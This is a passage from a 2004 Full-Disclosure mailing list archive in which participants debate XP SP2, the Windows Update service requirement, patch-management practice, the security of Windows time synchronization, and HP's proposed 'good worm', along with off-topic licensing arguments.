program updates to the scanning engine? Besides that, If you can't trust the definitions updates to go properly, then you seriously need to think about changing AV products. ;) Reading further down the conversation, I see discussion on the Auto-Update service. Some good points were mentioned here too. Just because it is enabled it doesn't mean you have to let them INSTALL. In fact, you can do an advanced install method to pick and choose which patches to install from the downloaded updates. A nice feature indeed - I hope this hasn't been altered in post SP2. (I never checked.) My point was to argue against the automated downloading and installing of updates, which I believe IS the default after SP2 is installed. ~G On Sun, 22 Aug 2004 09:01:54 -0400, joe [EMAIL PROTECTED] wrote: If that is your stance, you should probably have it for AV updates as well. There have been various AV updates that have been known to break functionality and blue screen boxes. I recall one update for one of my customers that had blown up a good many web servers and local site file and print servers (hundreds of servers) and this is with an AV Update that was approved by and placed on the distribution server by central security. Anyway, versus completely shutting down WU, you can configure to automatic download without installation. All that being said, actively professionally maintained servers are in a different boat than most machines that will be running WU. In a large properly firewalled and protected corporate environment, I don't think the client support group would really depend on automatic updates from outside the company, they would use SUS or some other deployment mechanism. If using some other deployment mechanism, WU would be off. Either way, patches would be tested before being deployed, it wouldn't be automatic. That being said, once you get to x machines with x being a function of your resources available to do testing, the number of LOB apps you have running, and how bad the hole is being plugged you will run into occasion where you can not test everything and simply have to release. One would hope that this will be less frequent if you have XP SP2 deployed and have the firewall up and running without turning it into swiss cheese but until we see the next worm type attack and see if XP SP2 is safer we can't for sure say anything. If the biggest issues end up requiring some sort of people interaction, then that is quite a win in and of itself. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Über GuidoZ Sent: Saturday, August 21, 2004 7:56 PM To: FD Subject: Re: [Full-Disclosure] Windows Update Umm, hold on a sec here... (snip from James Tucker): There really should be no reason why you would want
RE: [Full-Disclosure] Windows Update
The client is required. I have sent a complaint to MS though concerning the idea that the service set to manual but started doesn't allow the updates to occur. That, I agree, is a bad design choice. If the service is set to automatic but not started, it will get started as soon as you try to actually search for updates. Having it set to auto and not started just gets you past the initial check. I actually replaced the service with a quick do-nothing service I wrote and the web page gets past the initial check but then hangs in the search for updates section. I have no doubt that the client is actually used and needed. Once again, I agree requiring the service set to automatic is poor. Again however, this isn't life threatening or insecure, just a pain. Simply use something to quickly change the start config for the service before going to the windows update site and change it back afterward. No big hoo hoo. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Monday, August 23, 2004 4:35 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windows Update It's a little bit more than seriously annoying, though. It represents a very poor design choice. Obviously, if this setting change works, it means that the automatic update client is not actually necessary to install patches from windowsupdate. I could see the service requirement *if* Microsoft were piggybacking the installation code off of the client in an effort to no longer rely on installing the code with an ActiveX control, however what this demonstrates is that the only reason to do this check is strictly to ensure that automatic updates is running. This is either a bug or a very poor design choice. If the idea is to ensure that everyone has automatic update running, then it's going fail. The people who are getting their updates from WindowsUpdate are not the people you generally need to worry about getting their patches -- it's the people who don't know about WindowsUpdate and who don't have automatic update running that you have to worry about. What I'm saying is that warning people is good; blocking people is bad. It's kind of like not letting someone get a medical checkup if they don't check their blood sugar everyday. It hurts people more than it helps. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows Update
What I see Microsoft as doing is pretty much forcing everyone to turn on Automatic Windows Update. Why leave it as a control panel option, I've no clue. Same with BIT (Background Intelligent Transfers.) For the millions of users out there that are likely subject to viruses, etc, I'm sure it will help make things better, but for people who would fit into the power user class, it's a real pain in the arse. SNIP I really object to this philosophy because it does not let a person plan the downloading and installation of updates - some of which will require a reboot. No they aren't. If you don't want auto updates, you set it to no autoupdates, like my machine is now. Then it won't do anything unless you go out and tell it to. Of course the service is still running but if you are a power user, you know how to disable the service and reenable when you want to go get the updates. As I mentioned previously, this is kind of a pain, but certainly isn't forcing you to have AU on and has no impact on your planning of downloading and installing of updates. A power user knows it only takes a single command line to stop and disable the WU service and single command line to reenable and start it again. What do large corporate installations of Windows do here? Depends on the company. The large ones I have worked/talked with, 5k+ seats to about 200k seats, use various methodologies for deploying software and patches, from custom in house services to simple batch files to SMS to Windows Update service either due to using SUS or using the Update Web Site. Do they run their own caches of the Windows updates? In many cases yes. Depends on the deployment method. Push out updates from servers rather than have clients pull? In some cases yes. Is it all done with SUS? Nope, but many do. Is SUS usable on a single node, in place of WU? SUS depends on the WU client. The help for the Windows Update web site suggests that it is possible to get updates without Automatic Updates. Is the help out of date or is there a way to still do it without AU on ? You go to the KB articles or security bulletins and download the qfe's manually. In my last job as a Server Admin, there wasn't a single update in 3 years I pulled through Windows Update Web site. In fact the company blocked that traffic at the firewall. I or our systems integration group would check out the new issues and download the patch or get it from Microsoft Support and then integrate it into our patching methodologies (basically batch it up for silent install) and test it to make sure the install wasn't damaging then test it for functionality then deploy it. The client group would slap the patch package into the software deployment system and it would zoom out to the local site servers where the local admins would schedule the deployment to their local workstations. There is no hard fast answer to patch management. Many at the corporate levels beat MS for that but then many others don't care as they already have something be it shavlik, SMS, SUS, or something they have whipped up for themselves from fancy batch files to interactive perl scripts to automatic service/daemon like service scripts, to actual custom executables. Personally I like the freedom of choice in how things can be deployed, I certainly wouldn't want to be railroaded into a single methodology like you misunderstand WU to be. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Darren Reed Sent: Monday, August 23, 2004 6:52 AM To: Security List Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windows Update In some mail from Security List, sie said: Went to windows update last night w/ XP Pro. Redirected to the v5 version. I was asked to install the new Windows Update software...downloaded the WU software...copied the files...then saw registering...kinda thinking that it was checking for a valid registration or license. No updates needed according to WU. XP SP2 is not available via WU for XP Pro yet. Now, I checked the Automatic Update service to see if it was turned back start automatic as I always have it disabled. Yup, it was set to automatic and it was started. I stop and disable automatic update service, and try WU. Get error stating that the automatic update service must be enable to use WU now. Has anybody else head of this? Once again, we must have services that we do not want enable. I can not believe that they are forcing user to turn on the service to use WU. I discovered this when testing out v5beta and had to do a checkpoint recovery to restore version 4. If you don't install the latest Windows Update software (if, for example, you have all Active X stuff set for prompting and you say no) then you don't even get to 1st base and Windows Updates (via a convienient mechanism) are not available. IMHO, this sucks big time. What I see Microsoft as doing
RE: [Full-Disclosure] The 'good worm' from HP
Allan is right. I didn't notice people calling it a worm. From the article at InfoWorld... SNIP We've been working with (customers) for the last month now, said Tony Redmond, vice president and chief technology officer with HP Services in an interview. SNIP This is a good worm, said Redmond. It's turning the techniques (of the attackers) back on them. SNIP Possibly he used a bad choice of words. I definitely agree though that you probably shouldn't be infecting machines to patch them. In order to patch through a hole like that you are running code through that hole and that is the same as infecting in my book, you just aren't propogating. You could still make the machine unstable or cause other issues. I think my preference would be something along the lines of what the NetSquid project is doing mentioned previously but be more aggressive. Sure have the feed from SNORT to actively go out and pop the machines currently sending bad traffic, but also scan for machines that *could* get infected and shut them down as well. That would be a good use of this tech HP is working on, simply identify the machines. However others have done the similar in terms of detection so that wouldn't be nearly as new and daring. They could do a good thing by making it fully supported by a big name, stable, quick, and part of an overall framework for protecting the network environment. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles Sent: Saturday, August 21, 2004 8:58 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] The 'good worm' from HP SNIP ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows Update
If that is your stance, you should probably have it for AV updates as well. There have been various AV updates that have been known to break functionality and blue screen boxes. I recall one update for one of my customers that had blown up a good many web servers and local site file and print servers (hundreds of servers) and this is with an AV Update that was approved by and placed on the distribution server by central security. Anyway, versus completely shutting down WU, you can configure to automatic download without installation. All that being said, actively professionally maintained servers are in a different boat than most machines that will be running WU. In a large properly firewalled and protected corporate environment, I don't think the client support group would really depend on automatic updates from outside the company, they would use SUS or some other deployment mechanism. If using some other deployment mechanism, WU would be off. Either way, patches would be tested before being deployed, it wouldn't be automatic. That being said, once you get to x machines with x being a function of your resources available to do testing, the number of LOB apps you have running, and how bad the hole is being plugged you will run into occasion where you can not test everything and simply have to release. One would hope that this will be less frequent if you have XP SP2 deployed and have the firewall up and running without turning it into swiss cheese but until we see the next worm type attack and see if XP SP2 is safer we can't for sure say anything. If the biggest issues end up requiring some sort of people interaction, then that is quite a win in and of itself. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Über GuidoZ Sent: Saturday, August 21, 2004 7:56 PM To: FD Subject: Re: [Full-Disclosure] Windows Update Umm, hold on a sec here... (snip from James Tucker): There really should be no reason why you would want to disable the Automatic Updates service anyway, unless you are rolling out updates using a centralised distribution system, in which case you would not need it anyway. I believe you are missing one fundamental point: SPs and updates are notorious for breaking something else. (Especially from Microsoft.) Granted, if fixing a security weakness breaks something you're using, then that aspect could have been written better. However, that still doesn't fix it when an entire business network goes down and YOU are the one responsible. I do not allow ANY automatic updates (except for virus definitions) to run on ANY networks I am in charge of. I take the time (like every good sysadmin should) to look over each update before applying it so I know three things: 1. What it's fixing/patching 2. Why it's fixing/patching it 3. What will be the end result of the fix/patch If you would simply allow updates and SPs to have free reign over your system(s) without taking any time to look over those updates, you're going to be one busy and irritated sysadmin. That is, if you still have a job after a little bit. ~G P.S. Don't take my word for it. Look here: - http://www.infoworld.com/article/04/08/12/HNdisablesp2_1.html - http://www.pcworld.idg.com.au/index.php/id;1183008015;fp;2;fpid;1 - http://www.integratedmar.com/ecl-usa/story.cfm?item=18619 - http://www.vnunet.com/news/1157279 - Or, find the other 200+ articles by searching Google News for disable automatic update sp2 =) On Sat, 21 Aug 2004 18:51:40 -0300, James Tucker [EMAIL PROTECTED] wrote: Here I found that I can have BITS and Automatic Updates in manual, Windows Update works fine here. It may be a good idea to refresh the MMC console page, as you will probably find that at time the service had shut down if and when BITS was stopped prematurely (i.e. when it was in use). There really should be no reason why you would want to disable the Automatic Updates service anyway, unless you are rolling out updates using a centralised distribution system, in which case you would not need it anyway. If you are worried about system resources, you should look into how much the service really uses; the effect is negligable, in fact there is more impact if you select (scroll over) a large number of application shortcuts (due to the caching system) than if you leave Automatic Updates on. If you are worried about your privacy and you dont believe that the data sent back and forth has not been checked before, then you surely dont want to run Windows Updates ever. If you want to cull some real system resources and have not already done so, turn the Help and Support service to manual, that will save ~30mb on boot, up until the first use of XP help; this will stop help links from programs from forwarding to the correct page, until the service has loaded once. As for worry over using bandwidth on your internet service, again, you want to check
RE: Re[2]: [Full-Disclosure] Security aspects of time synchronization infrastructure
Thanks. So assuming that the time change of a great (epoch date) magnitude could occur [1], it would occur in a fluid way across the entire forest (or at least the MS machines that are part of it). Have you actually tried to change time to some arbitrarily large and incorrect value and see if other machines can sync when it is set that way or is this speculation? Beyond that, time maintained on the Windows machines is not time_t based, it is FILETIME based (64 bit value whichis the number of 100 nanosecond intervals since 1/1/1601) format which should be able to represent any 4 digit year 1601. It can probably go beyond 4 digits but I don't expect any date routines will support a 5 digit year (holy crap - we now have a Y10K issue thanks MS, can't wait to have to deal with that one). Now that I see where you are going in terms of a vast major change to epoch ending, assuming the time change would sync across the forest I would guess that you could have a breakdown in kerberos if you somehow pushed the date beyond time_t capabilities but that is a guess. I am not sure how kerberos time is represented in the kerberos internals, are you aware of that format? Is it time_t? I would say that would be the main thing that could prompt you to say that the forest would be down. I would expect local logons to domain controllers by admins would still work (though they would probably have to change their password while logging on), the overall functionality of the environment would be unavailable - but again, this assumes kerberos stops working. Also I would guess various and sundry apps (or services) would possibly do odd things based on how they internally needed and used time. I would guess the event logs might be a little hokey for some apps. Accounts would lock if something was automatically sending the now bad passwords and not responding to the password has expired message (this assumes kerberos is working at all though which means the forest is actually up). This would impact mostly service accounts I would guess as well as network/application connections for people who were currently logged in. I really don't see why you feel a 12 hour change would hurt that much other than forcing an early refresh on kerb tickets. Do you have more detail on your thoughts on that? Specifics. So besides getting to a point where kerberos breaks due to how the time is structured in kerberos I don't see a forest that is down. If the time changed exceeded your tombstone period AND synced properly I could see replication stopping due to the delta from the last replication and not wanting to corrupt with possible bad data (i.e. lingering/revived objects). However the forest would be up and functioning in terms of authentication, you would just have to get the time corrected so replication kicks back in - which if it allowed the change in the first, place the change in the second place should be pretty easy. Anyway, I don't know how much of this I would push as an issue without actually testing to see what would happen. If the date was able to be pushed far enough, it could be painful, if kerberos is time_t based, then it could break. I would suggest working that out specifically. If you can actually force a bad date into the PDC emulator of the forest (and I am not arguing this point, I don't know enough about it), will it sync to the rest of the forest? And if so, can the date change be enough to break kerberos? I think in order to call the forest down, you would have to break either name resolution or authentication. I don't see name resolution breaking here, so you focus on authentication which would fall on kerberos. joe [1] I am still not entirely confident would occur, I think the downstreams would reject the time source but have no solid testing to prove this. -Original Message- From: 3APA3A [mailto:[EMAIL PROTECTED] Sent: Friday, August 20, 2004 2:22 AM To: joe Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re[2]: [Full-Disclosure] Security aspects of time synchronization infrastructure Dear joe, --Friday, August 20, 2004, 2:59:06 AM, you wrote to [EMAIL PROTECTED]: j If network is configured in accordance to these recommendations it's j possible to bring whole Windows 2003 forest down with a single UDP j packet. j What is your line of reasoning here? In a properly configured forest, j all machines will take their time from their default time source and j not from a preconfigured machine as you outlined. If the time on the j PDC emulator of the forest is spanked into a new value, either the j other machines will be unable to sync with it due to not being able j to authenticate with it or the Time synchronisation doesn't require authentication, at least it looks like packets are only signed with computer key. That's why it's still possible to change time across all forest with a single packet, if one of the forest's reliable time sources or PDC emulator in root domain
RE: [Full-Disclosure] Windows Update
Yep, this is how it works now. You control whether Windows Update is updating or not via the security panel in the control panel applets (wscui.cpl). Of course if you aren't using automatic update you could always disable the service and just reenable when you go to do the update, or don't use windows update at all and just pull the downloads separately. We are talking about a single command line to reenable that service If you like it disabled To enable Sc config wuauserv start= demand net start wuauserv To redisable Sc config wuauserv start= disable net stop wuauserv If you can live with it not being autostart To enable net start wuauserv To redisable net stop wuauserv You could even make a batch file to launch windows update and if it make the changes for you. If you want to get really fancy writing an app to do that wouldn't be overly involved either and then you can just replace what is fired by the icon for Windows Update. Is it a pain? Yes, for those who like to run minimal services. Is it a security issue or life threatening, probably not. As for SP2 not being available for Pro on WU yet, that is also correct. Corporations asked for a hold on the launch so they can get some testing done and if necessary get a registry change in place to block WU auto updates of SP2 until later. You obviously still can manually go download it. It will not be available for Pro on WU until at least 8/25/2004. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ISNYC Sent: Friday, August 20, 2004 1:31 PM To: 'Security List'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Windows Update I have had that same issue. Check to see if your BITS Service is on. I had mine disabled. It didn't like that. Try enabling the BITS service, then try again. I have Automatic Updates disabled now, and I can update manually. Ez. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Security List Sent: Friday, August 20, 2004 11:51 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Windows Update Went to windows update last night w/ XP Pro. Redirected to the v5 version. I was asked to install the new Windows Update software...downloaded the WU software...copied the files...then saw registering...kinda thinking that it was checking for a valid registration or license. No updates needed according to WU. XP SP2 is not available via WU for XP Pro yet. Now, I checked the Automatic Update service to see if it was turned back start automatic as I always have it disabled. Yup, it was set to automatic and it was started. I stop and disable automatic update service, and try WU. Get error stating that the automatic update service must be enable to use WU now. Has anybody else head of this? Once again, we must have services that we do not want enable. I can not believe that they are forcing user to turn on the service to use WU. __ Do you Yahoo!? Yahoo! Mail - 50x more storage than other providers! http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Microsoft Windows XP SP2
I believe the $300 million figure being quoted has the marketing of SP2 in there. They want to get the word out globally to get patched and are supposed to do a lot to help out the folks in areas that can't get it off the NET. Also I believe they are supposed to pull the current retail boxed copies of XPs in stores and replace with XP2 versions. Also many security pros have petitioned Microsoft to release SP2 CDs like AOL CDs - have them for free in computer stores and magazines, etc. Whether that will happen or not remains to be seen. But MS is pretty adamant about trying to get as many machines patched as possible. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Thursday, August 19, 2004 11:35 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Microsoft Windows XP SP2 Let's commence by giving credit where credit is due. The thinking is that the manufacturer of Windows XP has done a splendid job in patching their little operating system with 300 million dollar's worth of fixes. This is not exactly 'pocket change'. But this is: 1. trivial scripting in the local zone 2. notepad icon regardless of file in XP's little zip thing http://www.malware.com/malware.sp2.zip many other 'bits and pieces' to be had but overall a splendid effort on the manufacturer's part [for now]. Not quite sure where all that money went though. End Call -- http://www.malware.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Security aspects of time synchronization infrastructure
Interesting paper. I am curious about this statement though as you seemingly don't give supporting information. If network is configured in accordance to these recommendations it's possible to bring whole Windows 2003 forest down with a single UDP packet. What is your line of reasoning here? In a properly configured forest, all machines will take their time from their default time source and not from a preconfigured machine as you outlined. If the time on the PDC emulator of the forest is spanked into a new value, either the other machines will be unable to sync with it due to not being able to authenticate with it or the forest time will change and authentication will continue on. It could impact kerberos certs in that they may need to be reissued sooner, but I fail to see an issue where the entire forest could be brought down. I could see this having adverse affects on MIT trusts and non-MS kerberos clients unless they have the Vintela or Centrify *nix/Win integration software (or other software configured to do the same) that forces a timesync with the Forest. If you would prefer to discuss offline, that is fine as well. Thanks, joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of 3APA3A Sent: Thursday, August 19, 2004 5:26 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Security aspects of time synchronization infrastructure Hello bugtraq, Ipublished whitepaper called Security aspects of time synchronization infrastructure. It describes some observations on very common security flaws in time synchronization infrastructure design, including (but not limited to) MS Windows Active Directory. http://www.security.nnov.ru/advisories/timesync.asp Any comments are very appreciated. -- /3APA3A ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] lame bitching about xpsp2
. OT Stuff Anyway let me clarify a couple of things that the poster is incorrectly assuming and/or attributing to me. If only a #define statement were copied they wouldn't be obligated to disclose it's source. When I say they still have to acknowledge the source it means that execs worrying about lawsuits would much rather quote a source of information or code, no matter how small, than risk going to court because someone else perceives its use without acknowledgment. The point at which they wouldn't feel ANY need to do so is if they purchased rights to the code which may possibly be the reason you see so few references to other vendors who have obviously contributed to Windows. The fact that they implement a standard ip at all means there is some sort of derivation path somehow back to Berkeley, whether it comes through code bought from another company or directly used from BSD. I did not say that the only use was a #define, what I said was that would be enough to get MS to document it if they didn't otherwise outright own the rights. If you pick up a #define straight out of someone else's file without change, you are borrowing their work. It is small, but you are still borrowing. Someone may come looking because they may think it is more than a #define especially if the define betrays functionality not publicly documented. Not saying that is the case here so try not to read into what I am trying to say other than acknowledging use of someone else's code can occur even if it is some small piece, even if they aren't legally required. I agree that having code doesn't tell you lineage. You can look at it and look at something that you think it is derived from and get a possible answer but it would be difficult to ever prove it was or wasn't lifted unless it was verbatim up to and including the same silly misspellings and such. However, if the code documents its sources such as the main body of this code came from such and such corporation or these lines came from such and such a file in such and such distribution, you can either believe it is all a lie or you can go with Occam's razor. I choose the latter. I do, however, admit that I don't feel MS is evil Satan spawn trying to take my first born and my freedom of choice away. Once I don't have the option to buy or otherwise get a hold of alternate Operating Systems that are available then I may change my opinion. I don't see that ever happening though I do expect some collapse of the number available based on infighting and business/funding model. The existance of an alternative does not make the alternative readily available. You need a readily available alternative to prove your point, and right now that doesn't exist. I would say this is a pretty poor comment on our current position. The fact that you had issues getting what you wanted from where you wanted doesn't mean alternatives are not readily available. The only problem I see there is that the BSD people didn't have the foresight to license their code under the GNU GPL I think this could only have hurt its use and deployment. Many large businesses do not like GNU. Many people don't like it. I don't like it. I will never use GNU code within my code, I will rewrite what I need from scratch if I need it badly enough. I won't share my source, I tried, it turned out to be more pain than it was worth. I will use GNU licensed software because I like some of the stuff out there but I would use it even if it weren't GNU. I don't see why I should have the right to look at the source in order to use software. I am using the software by my choice, no one forces me to sit at a computer. They've already been declared a monopoly. This one always made me chuckle. The whole thing is based on the concept that there is no commercially viable alternative to Windows. This doesn't seem to be what the OSS and Apple vendors think or say. Munich doesn't think so... Google doesn't think so. If this were the actual truth, you wouldn't see Red Hat, Suse/Novell, Mandrake, etc doing what they do. I didn't think this was accurate in 99 and don't think so now. You obviously don't think so if you went to so much trouble to get an alternative, it is obviously a viable alternative to you and it sounds like IBM was trying to make it profitable for them. Another piece that is hilarious is While Microsoft may not be able to stave off all potential paradigm shifts through innovation, it can thwart some and delay others by improving its own products to the greater satisfaction of consumers. Holy cow, they can maintain customers by making a better product, that certainly is a monopoly and hurting the consumers. THEY MUST BE STOPPED! joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Tuesday, August 17, 2004 2:34 PM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] lame bitching about xpsp2 joe wrote
RE: [OT] Re: [Full-Disclosure] lame bitching about xpsp2
Since you cut out every piece that had anything to do remotely with this list, I will respond very briefly and then fail to respond to any more list posts on this from you unless you come back to the subject of security and away from OSS vs proprietary code. I know what is from what source based on the comments in the source. Whether or not you believe I know this info is well past any caring that I have for the subject. I am not going to do your shopping for you. I will let you go ahead and type linux in the search box at Dell and look at what your options are. Last time I looked a couple of weeks ago for my brother, the lowest priced Linux machine was something like the 370 or something like that for $900 or so. Walmart (world's largest retailer, sorry it doesn't fit your definition of who should sell a computer) has Linux PCs for like $300. PCs without any OS for like $225, again it has been a few weeks since I looked though. As for IBM, no clue what is on their site. Wouldn't buy anything from them, over priced with crappy quality. If you can't find a Linux PC from IBM though I find that humorous considering IBM's public stance on Linux... There is nothing in the world I can say to convince you about others' stances on GNU. I don't really care to try. It is simply another religious point for you. As to your entire argument about it, your wrong. Note I previously said I wouldn't use GNU, I haven't used GNU, hence I haven't had an issue with it as you assume. I read the license and said NFW. There is open source outside of GNU. Nothing GNU has/does would have helped with the issues I had with source I shared. Thanks, joe -Original Message- From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] Sent: Wednesday, August 18, 2004 11:56 AM To: joe Cc: [EMAIL PROTECTED] Subject: [OT] Re: [Full-Disclosure] lame bitching about xpsp2 joe wrote: If only a #define statement were copied they wouldn't be obligated to disclose it's source. I did not say that the only use was a #define, what I said was that would be enough to get MS to document it if they didn't otherwise outright own the rights. If you pick up a #define straight out of someone else's file without change, you are borrowing their work. It is small, but you are still borrowing. Someone may come looking because they may think it is more than a #define especially if the define betrays functionality not publicly documented. Not saying that is the case here so try not to read into what I am trying to say other than acknowledging use of someone else's code can occur even if it is some small piece, even if they aren't legally required. Understood - but your point was still incorrect. You're showing here that you really don't know exactly what was from what source. I, personally, have no problem with that. It's not a crime. My only question is why try to confuse things and make the point that the Win2k TCP/IP stack is not derived from BSDs code when you, in fact, can't say either way? The existance of an alternative does not make the alternative readily available. You need a readily available alternative to prove your point, and right now that doesn't exist. I would say this is a pretty poor comment on our current position. The fact that you had issues getting what you wanted from where you wanted doesn't mean alternatives are not readily available. OK - put your money where your mouth is. Pretend I'm a consumer. I have 2000 USD to spend and want a good PC with a good warranty with GNU/Linux on it. Find me a link to a major OEM that will ship me a PC within those specs with decent hardware and a generally recognized name (Dell, Gateway, HP, IBM...). The PC must be listed as a desktop system and must be easy to find. That's your assignment. That's the way that you can prove your point, and it's the only way. If the situation is as you claim it is, that should take you no less than 3 minutes. The clock is ticking... The only problem I see there is that the BSD people didn't have the foresight to license their code under the GNU GPL I think this could only have hurt its use and deployment. I suppose... if you count code taken from *BSD and added to proprietary projects, then I'd agree... I don't personally count that as deployment, though. Many large businesses do not like GNU. Ignorance will do that. Many people don't like it. Ignorance will do that. I don't like it. I think you're seeing my pattern. :) (It's not meant as a personal, ad hominem attack. Ignorance is OK. Admitting that it is the case is the first step to solving the problem.) I will never use GNU code within my code, I will rewrite what I need from scratch if I need it badly enough. I won't share my source, I tried, it turned out to be more pain than it was worth. I'm curious what you did that was so difficult. Adding source code to a package is not particularly difficult. I will use GNU
RE: [Full-Disclosure] RE: [Full-Disclosure]MS should re-write code with security in mind. lame bitching about xpsp2
I think you meant your first line to be All OS vendors should bite the bullet and re-write their code with security in mind. Not sure why you singled MS out for that statement. Especially considering the rest of the post. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Clairmont, Jan M Sent: Wednesday, August 18, 2004 11:52 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] RE: [Full-Disclosure]MS should re-write code with security in mind. lame bitching about xpsp2 M$ should just bite the bullet and re-write windows with security in mind, give it a true process scheduler, multiuser with windows as a client server processes. Build in 256 bit encryption and secure communications between processes and external communication with no unencrypted traffic. That would shut down a lot of these mindless bugs. All mail should be encrypted and point-to-point, with the mail servers only able to re-direct and broadcast mail with authentication. Maybe we could slow a lot of the hacking down and spam. But again until the market place demands it M$, Linux and everybody else it's business as usual. Keeps us employed I guess. Jan Clairmont Firewall Administrator/Consultant ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] lame bitching about xpsp2
South California's, University of Michigan's and others, which just shows that Windows isn't really written purely by M$... Of course, most, if not all, or even more, are still in Windows 2003. I didn't say that they didn't use BSD pieces, I said that he wasn't as accurate as he likes to think for the statement where he was naming specific tools and pieces. Use of BSD pieces doesn't mean that it was used in its entirety or even a lot, just that it was used in some manner, it could possibly be limited to #define statements in a header file. If that is done they still have to acknowledge the source. It can even be to acknowledge IP. I've looked at most of the components the poster spoke of, not the release notes, I am familiar with what companies and orgs the pieces came from. I know I didn't even start to imply that MS had written all of Windows from scratch. Actually I think that is one of the issues in that many pieces they didn't completely write gets thrown together with other pieces they did write. However if you can buy a tcp/ip stack or a zip implementation or a SQL Server or metadirectory for less than it takes to build it and grow the experience in-house, it makes business sense to do so. Microsoft is a business. Once you realize that, you understand idealism and religion have no place here. Sure, they invest in companies writing software, but only cause it doesn't compete in thier main market. To this all I can say is duh? How often do you see Ford giving money to GM, Hershey giving it to Morley, Goodyear giving it to BF Goodrich. Companies INVEST money in other companies, they DONATE money to charities. If two companies in the same market get together on a project they do it for mutual benefit and then have to duck as the government comes after them. Microsoft invested a great deal of money into ActiveState to push development of perl for the Win32 platform, do you feel they are out to make perl a Microsoft product? Even though many of us have asked for perl built-in they won't do it even though they have invested millions in it. But there aren't that many companies that do that. But there are, that is the point. There would be more companies doing so if there was a market and a profit to be had in this space. i.e. If everyone hated MS and Windows as much as you would like to think, other options would be used. This isn't electricity where you get it through one company or can't get it at all. This isn't oil where you only have one company processing it. You don't have no choice but to use a computer loaded with MS Software. So most people end up buying MS software even if they don't want it. Those people are flipping idiots. If they did that I could be how they would be so mad. Easier to blame someone else than themselves for being a moron. And have you tried getting the refund for the cra^H^H^Hunwanted software? No, because I don't buy things I don't want. Buying something you don't want and then whining for a refund is a bit silly don't you think? Incorrect. Under UK law a company has a monopoly once: Market share is over 25% High Barriers to entry Abnormal Profits Can exercise control over price or output I see, so Microsoft is exercising control over the price and output of other Operating Systems? How much did they make you pay for your last copy of Linux or BSD or ? Define what abnormal profits are? Because one company only makes 1% on their gross does that mean anyone making 10% on their gross is close to be called a monopoly? Ah, a traditional arguement. The users are stuipid, except I know some users who as far, far more intelligent than you or I. If they are far more intelligent than I on Windows then they are outside the scope of this discussion because I am betting they patch and otherwise secure their machines just fine. So to try and bring this back in once again, what are your specific gripes about XP SP2? Did it work for you when you loaded or not? Do you even have a Windows machine to load it on to have an opinion? joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ktabic Sent: Tuesday, August 17, 2004 11:35 AM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] lame bitching about xpsp2 On Mon, 2004-08-16 at 19:13 -0400, joe wrote: ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] SP2 is killing me. Help?
